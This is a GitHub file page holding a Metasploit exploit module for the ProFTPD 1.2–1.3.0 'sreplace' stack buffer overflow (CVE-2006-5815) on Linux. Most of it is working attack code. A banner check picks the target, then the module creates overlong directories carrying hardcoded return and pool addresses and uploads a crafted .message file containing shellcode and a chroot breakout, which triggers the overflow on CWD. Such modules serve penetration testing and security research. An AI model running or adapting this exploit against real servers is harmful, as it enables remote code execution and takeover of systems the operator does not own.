FilesExpand file tree

 master

/

16852.rb

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

242 lines (197 loc) · 6.54 KB

 master

/

16852.rb

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

242 lines (197 loc) · 6.54 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

##

# $Id: proftp_sreplace.rb 11526 2011-01-09 23:33:53Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GreatRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})

super(update_info(info,

'Name' => 'ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)',

'Description' => %q{

This module exploits a stack-based buffer overflow in versions 1.2 through

1.3.0 of ProFTPD server. The vulnerability is within the "sreplace" function

within the "src/support.c" file.

The off-by-one heap overflow bug in the ProFTPD sreplace function has been

discovered about 2 (two) years ago by Evgeny Legerov. We tried to exploit

this off-by-one bug via MKD command, but failed. We did not work on this bug

since then.

Actually, there are exists at least two bugs in sreplace function, one is the

mentioned off-by-one heap overflow bug the other is a stack-based buffer overflow

via 'sstrncpy(dst,src,negative argument)'.

We were unable to reach the "sreplace" stack bug on ProFTPD 1.2.10 stable

version, but the version 1.3.0rc3 introduced some interesting changes, among them:

1. another (integer) overflow in sreplace!

2. now it is possible to reach sreplace stack-based buffer overflow bug via

the "pr_display_file" function!

3. stupid '.message' file display bug

So we decided to choose ProFTPD 1.3.0 as a target for our exploit.

To reach the bug, you need to upload a specially created .message file to a

writeable directory, then do "CWD <writeable directory>" to trigger the invocation

of sreplace function.

Note that ProFTPD 1.3.0rc3 has introduced a stupid bug: to display '.message'

file you also have to upload a file named '250'. ProFTPD 1.3.0 fixes this bug.

The exploit is a part of VulnDisco Pack since Dec 2005.

},

'Author' =>

[

'Evgeny Legerov <admin [at] gleg.net>', # original .pm version (VulnDisco)

'jduck' # Metasploit 3.x port

],

'Version' => '$Revision: 11526 $',

'References' =>

[

[ 'CVE', '2006-5815' ],

[ 'OSVDB', '68985' ],

[ 'BID', '20992' ],

[ 'URL', 'http://seclists.org/bugtraq/2006/Nov/94' ],

[ 'URL', 'http://seclists.org/bugtraq/2006/Nov/538' ],

[ 'URL', 'http://bugs.proftpd.org/show_bug.cgi?id=2858' ],

[ 'URL', 'http://proftp.cvs.sourceforge.net/proftp/proftpd/src/main.c?view=diff&r1=text&tr1=1.292&r2=text&tr2=1.294&diff_format=h' ]

],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'PrependChrootBreak' => true

},

'Privileged' => true,

'Payload' =>

{

'Space' => 900,

'BadChars' => "\x00\x0a\x0d\x25",

'DisableNops' => 'True',

},

'Platform' => [ 'linux' ],

'Targets' =>

[

#

# Automatic targeting via fingerprinting

#

[ 'Automatic Targeting', { 'auto' => true } ],

#

# This special one comes first since we dont want its index changing.

#

[ 'Debug',

{

'Ret' => 0x41414242,

'PoolAddr' => 0x43434545

}

],

#

# specific targets

#

[ "ProFTPD 1.3.0 (source install) / Debian 3.1",

{

# objdump -D proftpd|grep call|grep edx

'Ret' => 0x804afc8, # call edx

# nm proftpd|grep permanent_pool

'PoolAddr' => 0x80b59f8

}

]

],

'DefaultTarget' => 0,

'DisclosureDate' => 'Nov 26 2006'))

register_options(

[

OptString.new('WRITABLE', [ true, 'A writable directory on the target host', '/incoming' ])

], self.class )

end

def check

# NOTE: We don't care if the login failed here...

ret = connect

# We just want the banner to check against our targets..

print_status("FTP Banner: #{banner.strip}")

status = CheckCode::Safe

if banner =~ /ProFTPD (1\.[23]\.[^ ])/i

ver = $1

maj,min,rel = ver.split('.')

relv = rel.slice!(0,1)

case relv

when '2'

status = CheckCode::Vulnerable

when '3'

# 1.3.x before 1.3.1 is vulnerable

status = CheckCode::Vulnerable

if rel.length > 0

if rel.to_i > 0

status = CheckCode::Safe

else

status = CheckCode::Vulnerable

end

end

end

end

disconnect

return status

end

def exploit

connect_login

# Use a copy of the target

mytarget = target

if (target['auto'])

mytarget = nil

print_status("Automatically detecting the target...")

if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then

print_status("FTP Banner: #{banner.strip}")

version = m[1]

else

raise RuntimeError, "No matching target"

end

regexp = Regexp.escape(version)

self.targets.each do |t|

if (t.name =~ /#{regexp}/) then

mytarget = t

break

end

end

if (not mytarget)

raise RuntimeError, "No matching target"

end

print_status("Selected Target: #{mytarget.name}")

else

print_status("Trying target #{mytarget.name}...")

if banner

print_status("FTP Banner: #{banner.strip}")

end

end

#puts "attach and press any key"; bleh = $stdin.gets

res = send_cmd(['CWD', datastore['WRITABLE']])

pwd = send_cmd(['PWD'])

if pwd !~ /257\s\"(.+)\"/

raise RuntimeError, "Unable to get current working directory"

end

pwd = $1

pwd << "/" if pwd[-1,1] != "/"

dir1 = "A" * (251 - pwd.length)

res = send_cmd(['MKD', dir1])

res = send_cmd(['CWD', dir1])

res = send_cmd(['PWD'])

dir2 = "B" * 64

dir2 << [mytarget.ret].pack('V')

dir2 << [mytarget['PoolAddr'] - 4].pack('V')

dir2 << "\xcc" * 28

res = send_cmd(['DELE', "#{dir2}/.message"])

res = send_cmd(['DELE', "250"])

res = send_cmd(['RMD', dir2])

filedata = ''

filedata << 'A'

filedata << "\x66\x81\xc2\x5e\x13\x52\xc3"; # add $0x135e, %dx; push %edx; ret

filedata << "\x25C" * 11

filedata << 'A'

filedata << payload.encoded

filedata << rand_text_alphanumeric(900 - payload.encoded.length)

filedata << "\x25\x43\x41" * 10

res = send_cmd(['MKD', dir2])

res = send_cmd_data(['PUT', "#{dir2}/.message"], filedata, 'I')

# Trigger sreplace overflow

res = send_cmd(['CWD', dir2])

handler

disconnect

end

end